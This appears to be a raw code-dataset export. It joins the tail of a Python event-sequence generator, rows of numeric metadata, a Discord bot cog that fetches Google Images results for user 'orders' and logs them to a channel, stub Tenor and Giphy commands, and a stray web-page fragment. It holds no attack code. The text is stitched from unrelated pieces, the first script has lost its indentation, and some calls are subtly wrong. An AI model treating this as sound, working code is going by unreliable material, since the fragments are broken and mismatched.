# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
| 33.405162
| 114
| 0.510137
| 16,004
| 141,070
| 4.231255
| 0.025931
| 0.038558
| 0.039901
| 0.024499
| 0.964514
| 0.959921
| 0.957824
| 0.953616
| 0.947797
| 0.943604
| 0
| 0.017706
| 0.397058
| 141,070
| 4,222
| 115
| 33.413074
| 0.778431
| 0.116219
| 0
| 0.780275
| 0
| 0
| 0.060876
| 0.014306
| 0
| 0
| 0
| 0.000474
| 0.002013
| 1
| 0.048306
| false
| 0
| 0.00369
| 0.007716
| 0.073801
| 0.04059
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4468581d70ebf3e6fb721882f185cef4082b1c84
| 7,213
|
py
|
Python
|
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
cogs/order.py
|
SilentSerenityy/JDBot
|
cd404000f06d51757439e435b2aaedbbab233144
|
[
"MIT"
] | null | null | null |
import os, discord, time, async_cse, random, TenGiphPy
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
tenor_client = TenGiphPy.Tenor(token=os.environ["tenor_key"])
giphy_client = TenGiphPy.Giphy(token=os.environ["giphy_token"])
class Order(commands.Cog):
def __init__(self,client):
self.client = client
@commands.cooldown(1,30,BucketType.user)
@commands.group(name="order",invoke_without_command=True)
async def order(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing.")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
emoji_image = sorted(results, key=lambda x: SequenceMatcher(None, x.image_url,args).ratio())[-1]
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@order.command(brief="a command to shuffle images from google images")
async def shuffle(self,ctx,*,args=None):
if args is None:
await self.order(ctx,args="shuffle")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@commands.command(brief="a command to shuffle images from google images",aliases=["order-shuffle"])
async def order_shuffle(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@commands.group(name="tenor",invoke_without_command=True)
async def tenor(self,ctx,*,args=None):
if args:
results = await self.client.loop.run_in_executor(None, tenor_client.search(args, safesearch=True, limit=10))
print(results)
#going to be swapping to an async Tenorgiphy soon lol. This is true :D
if args is None:
await ctx.send("You can't search for nothing")
@tenor.command(help="work in progress",name="shuffle")
async def tenor_random(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.command(help="work in progress",aliases=["tenor-shuffle"])
async def tenor_shuffle(self,ctx,*,args):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.group(name="giphy",invoke_without_command=True)
async def giphy(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor")
@giphy.command(help="work in progress",name="shuffle")
async def giphy_random(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("giphy shuffle")
@commands.command(help="work in progress",aliases=["giphy-shuffle"])
async def giphy_shuffle(self,ctx,*,args):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("giphy shuffle")
async def cog_command_error(self,ctx,error):
if ctx.command and ctx.command.has_error_handler():
pass
else:
await ctx.send(error)
def setup(client):
client.add_cog(Order(client))
| 43.451807
| 163
| 0.694579
| 1,053
| 7,213
| 4.644824
| 0.154796
| 0.045798
| 0.061337
| 0.022081
| 0.832141
| 0.826007
| 0.802085
| 0.802085
| 0.787365
| 0.757309
| 0
| 0.018157
| 0.175378
| 7,213
| 166
| 164
| 43.451807
| 0.804136
| 0.009566
| 0
| 0.719178
| 0
| 0
| 0.215985
| 0.008819
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0.027397
| 0.027397
| 0
| 0.068493
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.